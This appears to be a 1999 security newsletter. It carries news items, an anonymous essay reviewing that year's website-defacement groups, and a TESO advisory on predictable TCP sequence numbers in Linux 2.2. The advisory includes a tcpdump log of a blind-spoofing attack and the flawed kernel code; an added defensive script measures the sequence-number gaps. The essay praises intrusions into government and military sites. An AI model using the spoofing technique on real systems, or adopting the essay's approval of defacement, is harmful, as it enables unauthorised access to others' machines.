The ActiveX weakness allowed hackers to manipulate programs on a user's computer when they visited a Web page or received e-mail via Microsoft's Outlook program.
Justice Dept. Funds Antihacking Campaign
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The Justice Department is trying to save children before they turn into hackers.
With its $300,000 funding of the Cybercitizen Partnership, an awareness campaign coordinated by the Information Technology Association of America, the Justice Department assumes the unusual role of helping to educate budding Web users about how to be responsible, law-abiding surfers.
The Cybercitizen Partnership, announced in March, is a joint Justice-ITAA effort aimed at protecting the country's Internet infrastructure from outlaw hackers and other criminals. Faced with a security breach, law enforcement officials don't know at first if they're confronting a foreign terrorist, a college student or a couple of sixth-graders who are having some fun with Dad's computer. But an ITAA official said that, upon investigation, a surprising number of cases involve child hackers.
The association says that information technology makes up about 6 percent of the global gross domestic product, some $1.8 trillion of electronic infrastructure that needs to be protected against disgruntled former employees, corporate spies and juvenile delinquents who like to pull pranks.
Figuring that it's too late to reform terrorists and spies, the ITAA decided to concentrate on the kids. The campaign, which debuts in January, will initially target children 12 and under, aiming to teach them proper online behavior and to instill a healthy disdain for hacking. The association wants to "help weed out some of the less meaningful system violations by curious children so that law enforcement can focus on the true criminals," says ITAA President Harris Miller.
The cash infusion from the Justice Department is in keeping with a long tradition of government-sponsored public education campaigns, from the Interior Department's Smokey the Bear messages against forest fires to the Drug Enforcement Administration's "Just Say No" war on drugs. Miller says the campaign could be expanded to educate kids about other aspects of proper Internet etiquette, such as warning them against sending spam (for kids, the modern-day equivalent of prank telephone calls) or visiting Web sites with adult content. The main focus of the campaign, however, will be to "send the message that hacking isn't cute, clever or funny."
In addition to the funding from Justice, the ITAA also plans to pass the hat among its own membership, a who's-who list of the high-tech industry that includes Microsoft (MSFT), America Online (AOL) and IBM (IBM). The association will also seek funds from foundations and possibly from private individuals.
The association has sent out a request to several public relations companies for ideas on how to run the campaign, which might include television and Internet advertising, brochures and even visits to schools. One possibility under consideration: the creation of a mascot, like the famous McGruff crime dog, to pass the message along in a friendly manner.
Quantum confidential
~~~~~~~~~~~~~~~~~~~~
Want to beat the hackers once and for all? As Simon Singh finds out, the enigmatic quantum world is about to make your secrets safe as houses
IT COULD HAPPEN in a few months or a few years. But sooner or later, a mathematician could make a discovery that jeopardises international security, threatens the future of Internet commerce, and imperils the privacy of e-mails. Today's codes and ciphers are good, to be sure. But it is probably only a matter of time before they become useless.
With the coming of the information age, we rely ever more heavily on cryptography to protect us from snoopers, cyber-crooks and Big Brother. Some of today's most secure codes exploit the fact that while it is easy to multiply two prime numbers together, it is almost impossible to start with the answer and work out which two primes were used to create it. But the day a mathematical genius discovers a short cut for finding the hidden prime numbers, these codes will crumble.
What everyone is looking for is a new form of code, one that is truly unbreakable. That's where the quantum world comes in. Exploiting the strange uncertainties of quantum physics can give you a code that nobody--no matter how clever--will ever be able to crack.
That's the theory. The trouble comes when you try putting it into practice. When quantum particles interact with the large-scale world they tend to lose the delicate information they contain. This makes it fiendishly difficult to use them to send information over any sensible distance. Difficult, but not impossible. In the past few years, researchers have succeeded in sending quantum-encrypted messages tens of kilometres down optical fibres. Now the challenge is to find a way to send quantum-encrypted information through the air. This will open the way to fully secure global communications, beamed up to an orbiting satellite and forwarded to any place on Earth. It's a phenomenal technical problem, but this year researchers at the Los Alamos National Laboratory in New Mexico achieved a breakthrough that looks set to transform the way we keep our secrets.
Online Credit Card Security Fears Waning, But Still a Factor
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A new report by Forrester Research, Inc. found that despite growing consumer comfort with online credit purchasing, the fear of using plastic on the Internet is still the largest obstacle to e-commerce.
According to the report, consumer worries about credit card security have been dropping since early 1998. Forrester examined this trend through three surveys: 120,000 households interviewed in early 1998, 95,000 households in early 1999 and 10,000 online households in July 1999.
Consumer Concern Has Fallen
In 1998, just 15 percent of online households felt safe using their credit cards for online purchases. In the most recent study, this number rose to 53 percent. Furthermore, the percentage of consumers who feel that the Internet is not a secure place to use a credit card has plummeted from 71 to 40 percent.
The survey also found that the longer consumers are online, the more comfortable they become with credit card security. However, this fact alone doesn't explain the waning security fears: 71 percent of consumers who were online for 6 to 12 months in January 1999 felt insecure using credit cards via the Internet. By July, this percentage dropped by 53 percent for consumers who were online for the same length of time.
Security Fears Still Choke E-Commerce
While security fears plummet, Forrester's survey found that 83 percent of consumers who have never shopped online still cite concerns over credit card security as the main reason for not buying online.
According to Forrester, these consumers are driven by a fear of technology snafus and untrustworthy e-tailers. The primary worry is that credit card information can be stolen during transmissions from a PC to an e-tailer. Additionally, 79 percent of those surveyed said that they didn't trust online merchants to safeguard this information -- while 53 percent feared giving their card numbers to e-tailers with no brick-and-mortar presence.
Nonetheless, general apprehension or bad experiences aren't entirely to blame. Forrester discovered that just 25 percent of skeptics say that they are generally wary when using a credit card for any type of purchase. A small group -- 4 percent -- points to a prior bad experience as the reason for not buying online.
How Can It Be Fixed?
Forrester asked reluctant consumers to identify what would make them more likely to use their credit cards online. After reviewing their answers, Forrester has come up with four ways that e-tailers can lessen consumers' reluctance to shop online:
Seventy-five percent of the skeptics say that knowing they were using a "secure server site" would make them feel more comfortable. In addition, 48 percent would feel better if e-tailers also had some sort of brick-and-mortar presence to make returns easy.
Forty-one percent of those surveyed by Forrester said that they would like to see online merchants adopt a money-back guarantee before they would be willing to use their credit cards online.
Finally, 45 percent of the consumers interviewed said that their fears would be eased if e-tailers displayed positive testimonials from satisfied customers on their Web sites.
India: Code-Smuggling? Absurd
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Indian officials Friday slammed as ridiculous a suggestion by US officials that Indian Y2K (Year 2000) software firms could have been used to smuggle in computer codes aimed at threatening Washington's security.
Michael Vatis, the top cyber cop in the Federal Bureau of Investigation, told Reuters Thursday that malicious code changes under the guise of Y2K modifications had begun to surface in some US work undertaken by foreign contractors.
The claim signaled possible economic and security threats.
Vatis, who heads the National Infrastructure Protection Center (NIPC), gave no details. But Terrill Maynard, a Central Intelligence Agency officer assigned to the NIPC, said in a recent article that India and Israel appeared to be the "most likely sources" of malicious code.
The article appeared in the June issue of Infrastructure Protection Digest.
"I think this is an utterly ridiculous assertion ... without, as far as I can see, any basis whatsoever," said Montek Singh Ahluwalia, chairman of the Indian government's Y2K Action Force.
"I have no idea if this report is factually correct and if indeed a responsible officer has made what appears to be an irresponsible statement," Ahluwalia told Reuters.
He said the Indian government had not received any official communication to suggest wrongdoing by Indian firms or agencies.
The CIA declined to comment on Maynard's article. Referring to it, Vatis said: "This is our effort to put out in the public information that hopefully can be useful to people."
Indian firms have done more than $2 billion worth of coding work to protect old computers whose date-fields denoted years only by the last two digits. Unless rectified, such computers can cause valuable data crashes when the year 2000 dawns.
India and Israel have had differences with the United States on security matters, particularly on nuclear policy.
Dewang Mehta, president of India's National Association of Software and Service Companies (NASSCOM), cited several reasons to dismiss suggestions Indian firms may be a security threat.
He told Reuters that too much was at stake for India's booming software companies, which have used Y2K as a strategy to gain long-term clients. Besides, Indian firms did the bulk of Y2K work at US sites under client supervision, he added.
"We cannot visualize that any moles have been planted. This is absurd. For us, too much is at stake," Mehta said.
He said Indian firms had also carried out "regression testing," which was aimed at ensuring Y2K programming work did not hamper other software in client systems.
Vatis said it was "quite easy" for an outsider to code in ways of gaining future access or causing something to "detonate" down the road.
This could expose a company to future "denial of service attacks," open it to economic espionage, or leave it vulnerable to malicious altering of data, he said.
Vatis said that so far "not a great deal" of Y2K-related tampering had turned up. But a US Senate panel said last week that long-term consequences of using foreign firms for Y2K work could include more espionage and reduced information security.
Mehta said he heard during a recent visit to Israel a rumor about a computer virus designed to wipe out Y2K solutions.
"I am afraid as only three months are left and many American systems are not compliant, this kind of global rumor-mongering is beginning to happen," he said. "We all think we should guard ourselves against it. NASSCOM strongly condemns such rumors."
Maynard noted Ireland, Pakistan, and the Philippines among nations whose firms did significant Y2K repair. He said they were "least likely" to harm US systems but did not rule out threat possibilities.
2. S P E C I A L
~~~~~~~~~~~~~~~~~
2. HACKING IN 1999 | THE CURRENT STATE OF HACKING
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Major Exploits released in 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
In 1999 many things have happened. The Allaire <http://www.allaire.com> Cold Fusion bug has been widely advertised and put to use; many servers were compromised with it, and if you look at a lot of the website defacement mirror sites, almost all of the defacements were done by the Cold Fusion method. Yet another easy bug was released in 1999 by the eEye <http://www.eEye.com> Digital Security Team, this one for the Microsoft <http://www.microsoft.com> IIS server, and again many people have used this method to make a name for themselves. After looking at exploits like this, it makes you wonder what a hacker is these days. Someone who uses a web browser to hack remote systems? Or is a hacker still defined as it was originally? Hacking is mostly about gaining access to a remote system, not showing off that you outsmarted an admin.
Major Incidents that have Affected the 'Scene'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The first major incident was the busting of Eric Burns, AKA Zyklon, when companies pressed lawsuits against him for thousands of dollars because he broke into their servers. Up to now he is still not allowed to touch a computer, I assume.
The second incident was the raiding of members of the well-known group gH <http://www.attrition.org/mirror/attrition/gh.html> a.k.a. global Hell. Approximately 19 people were raided, if not more, not only from gH <http://www.attrition.org/mirror/attrition/gh.html> but from other groups such as Level Seven <http://www.attrition.org/mirror/attrition/l7.html>, team spl0it <http://www.attrition.org/mirror/attrition/sploit.html>, milw0rm <http://www.attrition.org/mirror/attrition/milworm.html> and IL (Iron Lungs) from HcV <http://www.attrition.org/mirror/attrition/hcv.html>/Legion2000 <http://www.attrition.org/mirror/attrition/l2k.html> and forpaxe <http://www.attrition.org/mirror/attrition/forpax.html>.
Kevin Mitnick <http://www.kevinmitnick.com> was screwed around 2+ times, with them changing his court date around continuously and him now having to owe 1 mil.
Read more about it at 2600 <http://www.2600.com>, also support the FREE KEVIN <http://www.freekevin.com> movement.
Just recently, a few incidents have happened as a result of John Vranesevich, otherwise known as JP from AntiOnline <http://www.antionline.com>. First, Attrition <http://www.attrition.org> makes a good accusation that JP indeed funded a hacker known as 'so1o' to deface the Senate <http://www.senate.gov> Government website for him just to make a breaking news story (although I am not accusing him of doing this, because it was never proven). Another thing you notice about the "Anti Network" is the AntiCode <http://www.anticode.com> website, which claims to be "the only place you need" for all of your exploits/network/security tools and utilities. But in reality this site is nothing more than an archive compiled from other known sites and code ripped by AntiOnline <http://www.antionline.com> itself. The second MAJOR incident was when JP shut down a popular IRC server. And the third, probably most devastating to the underground community, was when JP caused Packetstorm Security to shut down; all of Ken Williams' files were deleted forever, his work ruined. Not to mention many other things. You can read about all those other things at:
<http://www.attrition.org/negation/index2.html>
A few conventions have passed, such as Defcon <http://www.defcon.org>, which is probably the most recognized of all hacker conventions. This year some major things happened at Defcon: they had a line-up of great speakers, Carolyn P. Meinel showed up and was not allowed in because she was accused of not being a 'real' reporter (which I will not comment on), and shortly into the Defcon <http://www.defcon.org> convention their website was defaced by the very well-known coding group ADM. Also Rootfest <http://www.rootfest.org> and the Blackhat Briefings have recently passed by.
Who has showed up?
~~~~~~~~~~~~~~~~~~
Many new groups and individuals have shown up so far in 1999. I will mention a few and give a decent description of them, their actions and their skills.
Groups :
~~~~~~~~
* Forpaxe - Forpaxe showed up in early 99. They have been responsible for hitting a record number of .edu domains, also quite a few .gov/.mil and numerous others. They are well known to all hackers and media. A member of the past groups Legion2000 and HcV, Iron Lungs, was a part of this group in the beginning and later got raided by the FBI. Now it appears to be just 2 individuals (m1crochip/in0de), which they state on all of their webpage defacements. They do what they do for a reason, so they are a decent group of individuals as far as I am concerned.
Mirrors of their Website Defacements <http://www.attrition.org/mirror/attrition/forpax.html>
* Goat Security - This organization is a definite mentionable, everybody knows and remembers the goat team, it consisted of members of gH, HcV and I think even a few from LoU. They defaced a good amount of websites and made a widely known name for themselves. They definitely knew what they were doing, not like all of the CF(cold fusion) kiddies you see around these days.
Mirrors of their Website Defacements <http://www.attrition.org/mirror/attrition/goat.html>
* gH (global Hell) - Possibly the most widely known hacker group worldwide and the most media-exposed, gH defaced a lot of high-profile websites such as Macweek <http://www.macweek.com>, Peoples Court <http://www.peoplescourt.com>, The Main Army Page <http://www.army.mil> and the Whitehouse <http://www.whitehouse.gov>. Many members were later raided by FBI agents due to the defacing of the Whitehouse website. They have skill and, as far as I saw it, a very good team of people. This group will always be remembered.
Mirrors of their Website Defacements <http://www.attrition.org/mirror/attrition/gh.html>
* Level Seven - This crew was responsible for numerous defacements. It is rumored, and also stated on some of their defacements, that members of this group were a part of gH (global Hell) and got raided. This group was another group that hacked for a decent reason. Mentionable mostly because of their tie-ins with gH. Nonetheless they are a good group.
Mirrors of their Website Defacements
<http://www.attrition.org/mirror/attrition/l7.html>
* Stonehenge Crew - Not very much to say about this group other than they have a purpose for what they do. They always have a reason for defacing a website they hit. They have done around 14 webpage defacements. It is rumored they are also 'tight' with the known group gH. This is another good group.
Mirrors of their Website Defacements <http://www.attrition.org/mirror/attrition/henge.html>
* Keebler Elves - Well, this group is probably the most skilled so far in 1999. Many skilled individuals, coders and hackers alike, are in it, from what is said at least. They are best known for their hacks of the Department of Education <http://www.ed.gov>, Virgin Records <http://www.virginrecords.com> and the Monmouth Army Base <http://www.monmouth.army.mil>. They have probably done the most recognized sites in 1999, and I wouldn't be surprised if they continue to hack big-time names. This group deserves a lot of respect. Why? Because they aren't like the rest.
Mirrors of their Website Defacements <http://www.attrition.org/mirror/attrition/keebler.html>
* HFD (Hacking for Drunks) - This is another group well known for its choice of sites to deface. Probably most recognized for their 20th Century Fox International <http://www.foxintl.com>, Gibson <http://www.gibson.com> and Blair Witch <http://www.blairwitch.com> website hacks. They seem to have a good sense of humor and have done some entertaining defacements. Very good group. But the name/logo is kind of ripped from HFG (Hacking For Girls) <http://www.attrition.org/mirror/attrition/hfg.html>.
Mirrors of their Website Defacements <http://www.attrition.org/mirror/attrition/hfd.html>
* bl0w team - A good Brazilian hacker group, consisting of 5 individuals, best noted for their 2600.co.uk <http://2600.co.uk> and Telemar <http://www.telemar.com.br> hacks. They do it all for an adequate reason and do not give up. I think their patriotism is admirable. They also seem to have a good amount of skill dealing with Solaris/NT systems.
Mirrors of their Website Defacements <http://www.attrition.org/mirror/attrition/bl0w.html>
* INDIANHackers / EHA / Ant1 S3cur1ty Taskf0rc3 / MST (Moscow Security Team) - Nothing special, not really even worth the time. They did a 'few' sites and were never heard from again. None of them really had any reason for defacing websites other than to make themselves look big. Ant1 S3cur1ty Taskf0rc3 did a few with reason, but it was rare with these 4 groups.
Mirrors of all the groups' defacements:
INDIANHackers <http://www.attrition.org/mirror/attrition/ndian.html>
EHA <http://www.attrition.org/mirror/attrition/eha.html>
Ant1 s3cur1ty taskf0rce <http://www.attrition.org/mirror/attrition/asc.html>
MST <http://www.attrition.org/mirror/attrition/mst.html>
-end-
Individuals :
~~~~~~~~~~~~~
* zo0mer - Hit a lot of government/military systems and banks. But it appears he removes data from the boxes after he is done. What would be labeled a malicious script-kiddie cracker.
Mirror of all his/her hacks <http://www.attrition.org/mirror/attrition/zoom.html>
* p0gO - Probably best known for his defacing of Time Warner San Diego <http://www.timewarnersandiego.com>. Not to mention his mass hack, he appears to have good skills, also is recognized for his association with irc.psychic.com <http://www.attrition.org/mirror/attrition/psychic.html>.
Mirror of all his/her hacks <http://www.attrition.org/mirror/attrition/pogo.html>
* Xoloth1 - Well-known hacker from the Netherlands. Hit some well-known porn sites and what would appear to be his spotlight defacement, Pentagon.co.yu <http://Pentagon.co.yu>. Xoloth hacks for all the right reasons.
Mirror of all his/her hacks <http://www.attrition.org/mirror/attrition/xoloth.html>
* v00d00 - First showed up on the scene doing a hack for Psychic <http://www.attrition.org/mirror/attrition/psychic.html>, shortly after doing defacements while he was part of the group Defiance <http://www.attrition.org/mirror/attrition/defiance.html>, it appears. He appears to hack for the freedom of Kevin Mitnick <http://www.kevinmitnick.com> AKA Condor and against war, racism and a lot of the problems that happen in the world these days. He does it for a good cause. That is all there is to say.
Mirror of all his/her hacks <http://www.attrition.org/mirror/attrition/v00.html>
* Mozy - Started hacking for irc.psychic.com, later went individual, noted to be good friends with several known hackers. His defacements are quite humorous if you ask me. Keep it up.
Mirror of all his/her hacks <http://www.attrition.org/mirror/attrition/mozy.html>
* dr_fdisk^ - Extremely well-known Spanish hacker, also known for being in the group Raza Mexicana <http://www.attrition.org/mirror/attrition/raza.html>. Most well known for compromising such sites as Nic.bo and HBO, Latin America <http://www.hbo-latinamerica.com>. Another hacker that does it for the freedom of Kevin Mitnick <http://www.kevinmitnick.com> and many other reasons.
Mirror of all his/her hacks <http://www.attrition.org/mirror/attrition/fdisk.html>
There are other individuals I missed, and they all deserve respect and to be noticed. I didn't forget them because I dislike them, just because this part of the article has gone far enough.
What was hit?
~~~~~~~~~~~~~
Aside from all the no-name sites that were hacked, in 1999 there have been several HIGH PROFILE web defacements. Below is a list with a link to each defaced site, provided by Attrition <http://www.attrition.org>.
* Ku Klux Klan <http://www.attrition.org/mirror/attrition/net/www.kukluxklan.net/>
* LOD Communication <http://www.lod.com>
* 200cigarettes Movie <http://www.attrition.org/mirror/attrition/com/www.200cigarettes.com/>
* Whitepride <http://www.attrition.org/mirror/attrition/com/www.whitepride.com/>
* No Limit Records <http://www.attrition.org/mirror/attrition/com/www.nolimitrecords.com/>
* Hotbot Search Engine <http://www.attrition.org/mirror/attrition/com/www.hotbot.com/>
* Summercon <http://www.attrition.org/mirror/attrition/org/www.summercon.org/>
* eBay <http://www.attrition.org/mirror/attrition/com/ebay.com/>
* Coca Cola (BE) <http://www.attrition.org/mirror/attrition/misc/www.cocacola.be/>
* US Senate <http://www.attrition.org/mirror/attrition/gov/www.senate.gov/>
* HBO, Latin America <http://www.attrition.org/mirror/attrition/com/www.hbo-latinamerica.com/>
* The White House <http://www.attrition.org/mirror/attrition/gov/www.whitehouse.gov/>
* Army Main Site <http://www.attrition.org/mirror/attrition/mil/www.army.mil/>
and so many more.... <http://www.attrition.org/mirror/attrition/>
Why do they do it?
~~~~~~~~~~~~~~~~~~
MOST of the time it is to make a name and become known/noticed, but on some occasions people do it for a reason, to prove faulty security, to protest against a certain problem in the world or a personal dispute.
Well that pretty much covers 1999. Most of the remembered parts up to now anyways.
Thanks a lot,
I prefer to remain anonymous.
Sites to check out :
Rootshell <http://www.rootshell.org>, Attrition <http://www.attrition.org>, HNN <http://www.hackernews.com> and OSAll <http://www.aviary-mag.com>
Written by anonymous for HNS (www.net-security.org <http://www.net-security.org>)
3. V U L N E R A B I L I T Y S
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Linux Kernel 2.2.x ISN Vulnerability
- 1.1 Systems Affected
- 1.2 Tests
- 1.3 Impact
- 1.4 Explanation
- 1.5 Solution
- 1.6 Acknowledgments
- 1.7 Contact Information
- 1.8 References
- 1.9 Exploit
1. Linux Kernel 2.2.x ISN Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
TESO Security Advisory
26/09/1999
Linux Kernel 2.2.x ISN Vulnerability
Summary: A weakness within the TCP stack in Linux 2.2.x kernels has been discovered. The vulnerability makes it possible to "blind-spoof" TCP connections. It is therefore possible for an attacker to initiate a TCP connection from an arbitrary non-existent or unresponsive IP source address, defeating IP-address-based access control mechanisms. Linux 2.0.x kernels were tested against this attack and found not to be vulnerable in any case.
1.1 Systems Affected
~~~~~~~~~~~~~~~~~~~~
All systems running kernel versions 2.2.x of the Linux operating
system. Linux 2.3.x systems may be affected too; we did not test
those versions.
In our test situations we noticed that it doesn't seem to matter
whether the TCP syncookie functionality was enabled or not (enabled
within the kernel and activated through the proc filesystem options).
1.2 Tests
~~~~~~~~~
This is the beginning of a log of a successfully mounted blind TCP
spoofing attack against a Linux 2.2.12 system.
(tcpdump output formatted for better readability)
16:23:02.727540 attacker.522 > victim.ssh : S 446679473: 446679473(0)
16:23:02.728371 victim.ssh > attacker.522: S 3929852318:3929852318(0)
16:23:02.734448 11.11.11.11.522 > victim.ssh: S 446679473: 446679473(0)
16:23:02.734599 victim.ssh > 11.11.11.11.522: S 3929859164:3929859164(0)
16:23:03.014941 attacker.522 > victim.ssh: R 446679474: 446679474(0)
16:23:05.983368 victim.ssh > 11.11.11.11.522: S 3929859164:3929859164(0)
16:23:06.473192 11.11.11.11.522 > victim.ssh: . ack 3929855318
16:23:06.473427 victim.ssh > 11.11.11.11.522: R 3929855318:3929855318(0)
16:23:06.554958 11.11.11.11.522 > victim.ssh: . ack 3929855319
16:23:06.555119 victim.ssh > 11.11.11.11.522: R 3929855319:3929855319(0)
16:23:06.637731 11.11.11.11.522 > victim.ssh: . ack 3929855320
16:23:06.637909 victim.ssh > 11.11.11.11.522: R 3929855320:3929855320(0)
...
The first ISN of the victim's host is 3929852318, which is within a SYNACK packet to the attacker's host. This is unspoofed and can be easily snagged by the attacker. At the same time the attacker sent out the first unspoofed SYN packet, he sent a spoofed SYN packet from 11.11.11.11 too. This packet is answered by the victim's host too, with the ISN of 3929859164. The difference between the first visible ISN and the second ISN is only (3929859164-3929852318) = 6846. Please notice that all TCP and IP parameters of the spoofed packet, except for the IP source address, are the same as those of the unspoofed packet. This is important (see below).
These small differences within the initial TCP sequence number (ISN) are
exploitable. In other tests, where both hosts were unlagged, we even had
differences below 500 sometimes. We've managed to successfully blind-spoof TCP connections on different Linux 2.2.x systems, that is, reach the TCP "ESTABLISHED" state without being able to sniff the victim host.
1.3 Impact
~~~~~~~~~~
By sending packets from a trusted source address, attackers could possibly bypass address based authentication and security mechanisms.
There have been similar exploitation techniques in the past, aimed especially at r* and NFS services, that demonstrated the security impact of weak ISNs very well. We have written a working exploit to demonstrate the weakness.
1.4 Explanation
~~~~~~~~~~~~~~~
The problem lies in an implementation flaw within the random ISN algorithm in the Linux kernel. The problem is within drivers/char/random.c, line 1684:

    __u32 secure_tcp_sequence_number(__u32 saddr, __u32 daddr,
                                     __u16 sport, __u16 dport)
    {
        ...
        static __u32 secret[12];
        ...
        secret[0]=saddr;   /* the only input that differs between the spoofed and the unspoofed SYN */
        secret[1]=daddr;
        secret[2]=(sport << 16) + dport;
        seq = (halfMD4Transform(secret+8, secret) &
               ((1<<HASH_BITS)-1)) + count;
        ...
    }
As already said, in our spoofed TCP SYN packet only the IP source address differs, that is only secret[0], so of the 12*4 bytes used to create the sequence number, only 4 bytes differ. Obviously the hash created by halfMD4Transform has similarities if the source and destination ports and the destination address are the same. It seems that the source address is least significant to the above MD4 algorithm; changing the source ports too makes the two ISNs differ more. Due to the short gap of time, the last step,

    seq += tv.tv_usec + tv.tv_sec*1000000;

is useless. This may be the reason why this bug has survived so long:
In any real network situation it is uncommon that the source and
destination ports are equal in two different connections on one host.
Further analysis of the hash algorithm in this routine may result in a better ISN prediction than the one we use (range prediction).
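The two checks a defender would want from sections 1.2 and 1.4 are (a) measuring, from a capture of one's own host, how far apart consecutive ISNs land, and (b) seeing what a keyed-hash ISN construction in the style of RFC 1948 does differently, namely treat the source address as just as significant as every other byte of the 4-tuple. The following Python is an added example written for this advisory; it is not TESO's exploit and not the kernel's algorithm. The capture it parses is the advisory's own tcpdump excerpt embedded as a string; the secret, the 65536 "suspiciously close" threshold and the use of HMAC-SHA256 truncated to 32 bits are this example's assumptions, not values from the advisory or the RFC.

```python
"""
Measure TCP ISN spacing from tcpdump output and contrast it with an
RFC 1948-style keyed-hash ISN generator.  Added example for this advisory;
not TESO code and not the Linux kernel's algorithm.
"""
import hashlib
import hmac
import ipaddress
import re
import struct
from typing import List, Tuple

# Sample capture: the advisory's own tcpdump excerpt (section 1.2), reproduced
# here so the example runs offline.
ADVISORY_LOG = """
16:23:02.727540 attacker.522 > victim.ssh : S 446679473: 446679473(0)
16:23:02.728371 victim.ssh > attacker.522: S 3929852318:3929852318(0)
16:23:02.734448 11.11.11.11.522 > victim.ssh: S 446679473: 446679473(0)
16:23:02.734599 victim.ssh > 11.11.11.11.522: S 3929859164:3929859164(0)
16:23:03.014941 attacker.522 > victim.ssh: R 446679474: 446679474(0)
16:23:05.983368 victim.ssh > 11.11.11.11.522: S 3929859164:3929859164(0)
16:23:06.473192 11.11.11.11.522 > victim.ssh: . ack 3929855318
16:23:06.473427 victim.ssh > 11.11.11.11.522: R 3929855318:3929855318(0)
"""

# Matches only SYN lines ("S <isn>:<isn>(len)"), tolerating the extra spaces
# the advisory inserted for readability.
SYN_RE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+)\s+"
    r"(?P<src>\S+?)\s*>\s*(?P<dst>\S+?)\s*:\s*"
    r"S\s+(?P<isn>\d+):\s*\d+\(\d+\)"
)

MOD32 = 1 << 32


def parse_syns(text: str) -> List[Tuple[str, str, str, int]]:
    """Return (timestamp, src, dst, isn) for every SYN line in tcpdump text."""
    out = []
    for line in text.splitlines():
        m = SYN_RE.match(line.strip())
        if m:
            out.append((m["ts"], m["src"], m["dst"], int(m["isn"])))
    return out


def host_of(endpoint: str) -> str:
    """'victim.ssh' -> 'victim'; '11.11.11.11.522' -> '11.11.11.11'."""
    return endpoint.rsplit(".", 1)[0]


def isn_deltas(syns: List[Tuple[str, str, str, int]], host: str) -> List[int]:
    """
    Forward differences (mod 2^32) between the ISNs `host` chose for
    successive connections.  Retransmitted SYNs (same peer, same ISN) are
    skipped so they do not show up as a misleading delta of zero.
    """
    seen = set()
    chosen = []
    for _ts, src, dst, isn in syns:
        if host_of(src) != host or (dst, isn) in seen:
            continue
        seen.add((dst, isn))
        chosen.append(isn)
    return [(b - a) % MOD32 for a, b in zip(chosen, chosen[1:])]


def small_deltas(deltas: List[int], threshold: int = 1 << 16) -> List[int]:
    """
    Deltas below `threshold` (an arbitrary, constructed cut-off): a generator
    drawing from the full 32-bit space would almost never land this close to
    its previous value, so such gaps are exactly what a blind spoofer guesses.
    """
    return [d for d in deltas if d < threshold]


def keyed_isn(saddr: str, daddr: str, sport: int, dport: int,
              secret: bytes, clock: int) -> int:
    """
    RFC 1948-style ISN: clock + F(4-tuple, secret), with F a keyed hash
    (HMAC-SHA256 truncated to 32 bits here; that choice is this example's,
    not the RFC's).  Every byte of the 4-tuple feeds the hash equally, so
    changing only the source address yields an unrelated ISN.
    """
    msg = (ipaddress.ip_address(saddr).packed
           + ipaddress.ip_address(daddr).packed
           + struct.pack("!HH", sport, dport))
    f = int.from_bytes(hmac.new(secret, msg, hashlib.sha256).digest()[:4], "big")
    return (clock + f) % MOD32


def circular_distance(a: int, b: int) -> int:
    """Smallest distance between two 32-bit sequence numbers, with wraparound."""
    return min((a - b) % MOD32, (b - a) % MOD32)


if __name__ == "__main__":
    deltas = isn_deltas(parse_syns(ADVISORY_LOG), "victim")
    print("victim ISN deltas:", deltas, "suspiciously small:", small_deltas(deltas))
    secret = b"constructed-demo-secret"   # a real stack draws this from its RNG
    a = keyed_isn("10.0.0.1", "10.0.0.2", 522, 22, secret, 1000)
    b = keyed_isn("11.11.11.11", "10.0.0.2", 522, 22, secret, 1000)
    print("keyed ISNs for two source addresses:", a, b,
          "distance:", circular_distance(a, b))
```

Run against the advisory's log, `isn_deltas` reports the single delta of 6846 the text computes by hand, and `small_deltas` flags it; feeding the same script a capture of your own server's SYN-ACKs (one `tcpdump` run while opening a handful of connections) gives the same measurement for the stack you actually run. The keyed construction is shown for contrast only: with the source address inside a keyed hash rather than a lightly mixed input, the two ISNs for 10.0.0.1 and 11.11.11.11 share nothing an observer could use.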
1.5 Solution
~~~~~~~~~~~~
First: It's always unwise to rely on address based authentication,
because in a sniffable environment, such as the Internet, there
are always means of bypassing address based authentication.
Second: The press shouldn't hype this as _THE_ Linux bug.. everyone having looked at the ISNs/DNS Sequence numbers of any of Microsoft's
operating systems knows that their 'random numbers' are _much_
easier targets to use for IP and DNS spoofing attacks. For
a description of how the ISN numbers of the Microsoft Windows NT
TCP stack have even weakened with the latest Service Packs, you
may want to browse the latest postings to the Bugtraq security
mailing list [1] or read [2]. Well.. not that it matters.. but who uses Microsoft software anyway ?
The Linux kernel developers have been notified at the same time as the
public Linux community, so a safe patch should be available real soon.
1.6 Acknowledgments
~~~~~~~~~~~~~~~~~~~
The bug discovery and the exploit are due to:
Stealth <http://www.kalug.lug.net/stealth>
S. Krahmer <http://www.cs.uni-potsdam.de/homepages/students/linuxer>
This advisory has been written by typo and scut.
The tests and further analysis were done by stealth and scut.
The demonstration exploit has been written by S. Krahmer.
1.7 Contact Information
~~~~~~~~~~~~~~~~~~~~~~~
The teso crew can be reached by mailing to teso@shellcode.org. Our webpage is at <http://teso.scene.at/>
1.8 References
~~~~~~~~~~~~~~
[1] Mail to the Bugtraq mailing list
From: Roy Hills <bugtraq-l@NTA-MONITOR.COM>
Subject: NT Predictable Initial TCP Sequence numbers - changes observed
with SP4
[2] Microsoft Knowledge Database Article
ID: Q192292 "Unpredictable TCP Sequence Numbers in SP4".
[3] libUSI++, a spoofing library
<http://www.cs.uni-potsdam.de/homepages/students/linuxer/>
[4] TESO
<http://teso.scene.at/>
[5] S. Krahmer
<http://www.cs.uni-potsdam.de/homepages/students/linuxer>
1.9 Exploit
~~~~~~~~~~~
We've created a working exploit to demonstrate the vulnerability.
The exploit needs libUSI++ installed, which can be obtained through [3]. The exploit is available from either
<http://teso.scene.at/>
or <http://www.cs.uni-potsdam.de/homepages/students/linuxer/>
------
4. R E A D I N G M A T E R I A L
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Books:
- Mastering Network Security -<http://www.amazon.com/exec/obidos/ASIN/0782123430/netsecurity>
